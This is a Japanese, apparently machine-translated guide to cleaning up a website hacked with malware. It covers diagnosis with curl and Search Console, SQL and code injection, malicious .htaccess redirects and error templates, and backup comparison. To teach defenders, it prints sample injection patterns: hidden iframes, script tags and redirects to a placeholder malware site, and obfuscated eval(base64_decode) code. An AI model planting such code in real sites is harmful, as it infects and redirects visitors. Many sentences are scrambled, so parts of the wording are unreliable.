マルウェアを含むハッキング

マルウェアとは、特定の組織やソフトウェアに害を及ぼすことを コンピュータ、モバイル デバイス、実行中のソフトウェア、ユーザーなど、あらゆるものを指します。 マルウェアについて詳しくは、マルウェアと望ましくないソフトウェアをご覧ください。

サイトにマルウェアが含まれている場合、通常はユーザーに警告が表示されます。 「このサイトはパソコンに損害を与える可能性があります」が検索結果または ユーザーがサイトにアクセスしようとしたときにブラウザに表示されるインタースティシャル ページ たとえば次のように指定します。

<ph type="x-smartling-placeholder">
</ph> 典型的なマルウェア・インタースティシャル・ページ
マルウェアの警告が表示された検索結果
で確認できます。

次のものが必要です。

  • サイトのサーバー(ウェブ、データベース、 できます。
  • シェルまたはターミナル コマンドに関する知識
  • データベースに対して SQL クエリを実行する機能。

準備

  • Search Console に登録する 記載の手順に従って、ハッキングされたサイトの所有権を確認してください。 Search Console では、影響を受けるページのサンプルが提供されています。これにより、 ハッキングされたマルウェアの問題を 容易に解決できるからですさらに、この警告が サイトがマルウェアやハッキングの被害を受けている場合。

  • Google セーフ ブラウジングの診断ページを表示 では、サイトがユーザーにとって有害である可能性についての公開情報を確認できます。 ページまたはサイトのリスティングのステータスは、次のような URL で確認できます。 https://transparencyreport.google.com/safe-browsing/search?url=***&lt;&lt;page_or_site>>***例: https://transparencyreport.google.com/safe-browsing/search?url=webmastercentralblog.blogspot.com

    <<page_or_site>> には、特定のページの URL(http://example.com/badpage)または 追加することもできます。

  • ブラウザを使用してサイトのページを表示することは避けてください。マルウェアは多くの場合 ブラウザの脆弱性を悪用して拡散し、マルウェアに感染した コンピュータに損害を与える可能性があります。診断手順が ブラウザで直接ページにアクセスするには、cURL を使用するか、 Wget で HTTP リクエストを実行する (ページの取得など)。

    これらは無料で入手できるもので、リダイレクトの診断に役立ち、 リファラーやユーザー エージェントの情報を柔軟に含めることができます。例 ハッカーを模倣するのに役立つため、特定のリファラーやユーザー エージェントが ハッカーが悪意のあるコンテンツを提供するのは、 ユーザー エージェントやリファラーを使用して、より「実際の人」をターゲットにする避ける サイト所有者やマルウェア スキャナによる検出です。

`curl -v --referer "http://www.google.com" <your-url>`

次の例では、ユーザー エージェントと参照 URL の両方を指定しています。

`curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html`

両方を含むページと含まないページについては、 --referer "https://www.google.com": 一部のマルウェアのみがアクティブ化されているため Google 検索の検索結果からユーザーがアクセスしたとき。

  • このステップで判明したことを記録するドキュメントを作成します。ドキュメントは 最終的に、破損した各ファイルの名前と場所を(最低でも)含める どのように感染したかに関するメモが添付され、 サイトをクリーンアップして管理する

  • このページの前半の動画で、マルウェアの仕組みと 安全を確保する方法を紹介します。

診断

サイトに影響を及ぼしているマルウェアを特定する:

  1. [セキュリティの問題] レポートを開く 確認できます マルウェアに関する警告の説明を展開して、影響を受けているページの例を確認します。 なお、このリストはすべてを網羅しているわけではありません。一部のページについては、 検出します。
  2. サンプルのページで、次の種類のマルウェアをテストします。
で確認できます。

サーバー設定のマルウェア(望ましくないリダイレクト)

ハッカーがサイトを侵害し、サイトから訪問者をリダイレクトしています。 マルウェア攻撃サイトに不正にアクセスするのが一般的です。 できます。サーバー構成ファイルを使用すると、 サイトの特定のページやディレクトリに対して 確認できますたとえば Apache サーバーの場合は、.htaccess ファイルと httpd.conf ファイルです。

診断

[セキュリティの問題] レポートに表示された URL の例をいくつか確認します。回答 「サーバー設定」に感染したページからのアクセス感染には 使用します。

&lt; HTTP/1.1 301 Moved Permanently
&lt; Date: Sun, 24 Feb 2013 21:06:45 GMT
&lt; Server: Apache
&lt; Location: http://&lt;<strong>_malware-attack-site_</strong>&gt;/index.html
&lt; Content-Length: 253

影響を受けるファイルを特定する

シェルまたはターミナル アクセスを使用してサーバーにログインします(サイトはオフラインでもかまいません) 関連するサーバー構成ファイルを確認します。他にも ハッキングされたサーバー設定ファイルが 2 件あった場合に、これらのファイルで 未知のサイトへのリダイレクトなど、望ましくないディレクティブを排除できます。たとえば、 .htaccess` ファイルを開くと、次のようなリダイレクトが表示されることがあります。

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*
**RewriteRule ^third-page.html($|/) http://&lt;<em><strong>_malware-site_</strong></em>&gt;/index.html** [R=301]

SQL インジェクション

ハッカーがサイトのデータベースを侵害しました。たとえば、ハッカーは データベースのすべてのレコードにプログラムで不正なコードを挿入した 情報を必要とするページをサーバーが読み込む際に、 ページのコンテンツに悪意のあるコードが埋め込まれて、 サイト訪問者に害を及ぼす可能性があります。

診断

  1. 影響を受けた URL に対してコマンドラインでクエリを実行し、 「iframe」のような SQL 攻撃ワードに対するレスポンスが「eval」などを使用できます。

  2. データベース サーバーにログインするか、 phpMyAdmin.条件 Wget または cURL を使用した場合、そのページのソースで見つかったダメージを相関分析します 実際のデータベースエントリで Wget または cURL でコードを実行しますたとえば ページに危険な iframe が含まれていることに気付いた場合は、SQL コマンドを実行して iframe コードを検索するクエリ例:

    SELECT * FROM blog_posts WHERE post_text LIKE '%&gt;iframe%';

  3. サーバーにあるデータベースのログファイルとエラーファイルで、 たとえば、想定外の SQL コマンドなど、異常な動作を エラーが発生することがあります。

問題を修正する

感染した各データベース レコードを更新するか、最後に確認されたデータベースを復元してください バックアップです

コード インジェクション

サイトのページが改ざんされ、不正なコード( 検出します。

診断

[セキュリティの問題] レポートに表示された URL の例の一部に cURL を使用してアクセスする。 疑わしいコードがないか調べます。挿入コードには多くの型があり、 見つけにくくなります「iframe」などの単語を検索すると役に立つかもしれません見つける iframe コード。他にも「script」、「eval」、「unescape」がキーワードとして役立ちます。対象 「iframe」ですべてのファイルを検索する場合Unix ベースのシステムの場合:

$grep -irn "iframe" ./ | less</pre>

以下に、注意すべき一般的なマルウェアのパターンをいくつか示します。

悪意のあるサイトを読み込む iframe:

&lt;iframe frameborder="0" height="0" src="http://&lt;<strong><em>_malware-site_</em></strong>&gt;/path/file"
  style="display:none" width="0"&gt;&lt;/iframe&gt;

関数からスクリプトを呼び出して実行する JavaScript などのスクリプト言語。 攻撃サイト:

&lt;script type='text/javascript' src='http://&lt;<em><strong>_malware-site_</strong></em>&gt;/js/x55.js'&gt;&lt;/script&gt;

不正サイトにブラウザをリダイレクトするスクリプト:

&lt;script&gt;
  if (document.referrer.match(/google\.com/)) {
    window.location("http://&lt;<em><strong>_malware-site_</strong></em>&gt;/");
  }
&lt;/script&gt;

検知を避けるために難読化された悪意のあるコード:

eval(base64_decode("aWYoZnVuaauUl+hasdqetiDi2iOwlOHTgs+slgsfUNlsgasdf"));

有害なコードを無害なコードにランダムに書き込むように設計された共有オブジェクト ファイル スクリプト:

#httpd.conf modified by the hacker
LoadModule harmful_module modules/mod_harmful.so
AddModule mod_harmful.c

悪意のあるエラー テンプレート

「404 File not Found」などのエラー メッセージに使用されるテンプレートが構成されている 目的としていますこのようにして、攻撃者は、 サイト内に存在しないということです

診断

サイト内に存在しないページ、または別の種類のページをスローするページをリクエストする エラーが返され、レスポンスが別のサイトからのものか、 それ以外はマルウェアを含みません。

問題を修正する

ウェブサーバーにログインし、サーバー構成ファイルでエラーを検索する ページ ディレクティブを指定します。たとえば、Apache ウェブサーバーのエラー テンプレートを .htaccess ファイルで宣言されている。.htaccess ファイル エントリの例を次に示します。 悪意のあるサイトから 404 エラーページを取得:

ErrorDocument 404 http://&lt;<span class="red-text"><em><strong>_malware-site_</strong></em></span>&gt;/index.html

サイトをクリーンアップする準備ができたら、.htaccess ファイルを置き換えます 既知の正常なバックアップを持つか、不要な ErrorDocument ディレクティブを 既存の .htaccess 個のファイル。必要に応じて、実際のエラーファイルも サイト上にあります最後に、ウェブサーバーを再起動して、 有効になります。

不正使用されているサイトまたは悪意のあるサイトから読み込まれるリソース {compromised-resources}

以下が含まれていることがわかっているウェブサイトのコンテンツまたはリソースをサイトで使用している できます。これには、JavaScript ファイル、画像、その他のファイルがあります。 このため、他のサイトから読み込まれるマルウェアがお客様のサイトに報告されます。 サイトをご覧ください。

診断

[セキュリティの問題] レポートに表示されている URL の例にアクセスします。

問題を修正する

  1. ページに表示された URL のサンプルを参照して、問題を確認します。 Search Console の [セキュリティの問題] レポート。ブラウザの警告が表示されます。
  2. ブラウザの警告に、疑わしいコンテンツのドメインが表示されます。 ブラウザの警告に表示されているフラグが付いたサイトへの参照をすべて削除します。 報告されたサイトのコンテンツが知らないうちに追加された場合、 問題はもっと深刻ですサイトが侵害されている可能性が最も高い場合は、 引き続きサイトを検証し、他のハッキングや脆弱性がないか確認します。
  3. 正規のサイトのコンテンツを意図的に含めてしまい、 報告され、問題が報告された後にコンテンツを再登録したい場合 クリーンアップが完了したら、 Google セーフ ブラウジングの診断ページhttp://www.google.com/safebrowsing/diagnostic?site=www.example.com){:.external} のようにします。 通常、正当なサイトの所有者はすぐにクリーンアップします。

追加の調査

次に、システムに悪意のあるファイルや変更が加えられていないかどうかを確認します。「 ハッカーが、既存のページやデータベース レコードを改ざんし、そのレコードを完全に スパム行為のある新しいページ、クリーンなページでスパムを表示する関数、または "バックドア"ハッカーによるサイトへの再侵入を可能にする 手法や 削除しました。

サイトがオンラインの場合は、調査のためにオフラインにすることを検討してください。

サイトの正常なバックアップがある場合は、 作成されたか変更されたファイルを監視し、調査します。Unix ベース 次のようなコマンドを使用して新しいファイルを見つけることができます。

diff -qr <current-directory> <backup-directory>

例:

diff -qr www/ backups/full-backup-20120124/

また、

md5sum <current-page> <backup-page>

例:

md5sum www/page.html backups/full-backup-20120124/page.html

サーバーログ、アクセスログ、エラーログで、次のような不審なアクティビティがないか確認します。 失敗したログイン試行、コマンド履歴(特に root 権限)、 不明なユーザー アカウント。ハッカーがこれらのログを改ざんした可能性があることに注意する 使用しないでください。サンプルを次の動画でご覧いただけます: 脆弱性を特定する

リダイレクトの構成ファイルを確認する。構成ファイルは 通常は .htaccesshttpd.conf という名前です。ハッカーは多くの場合、 ユーザー エージェント、時間帯、参照 URL に基づいてリダイレクトします。必要に応じて 更新すると、構成のためにサーバーを再起動する必要が 有効になります。

フォルダとファイルの権限の緩すぎるものがないか確認します。攻撃者は なぜなら、サイト所有者が緩やかな権限を検出できないと、 ハッカーがサイトに再侵入する方法が与えられます。次の値より大きいファイル 644 (rw-r--r--) および 755 (rwxr-xr-x) を超えるフォルダは、セキュリティに関与している可能性があります サポートします。緩く設定した権限が本当に必要かどうかを確認します。オン Unix ベースのシステムでは、次を試してください。

find <your-dir> -type d -not -perm 755 -exec ls -ld {} \;

および

find <your-dir> -type f -not -perm 644 -exec ls -la {} \;

データベースがある場合は、 phpMyAdmin.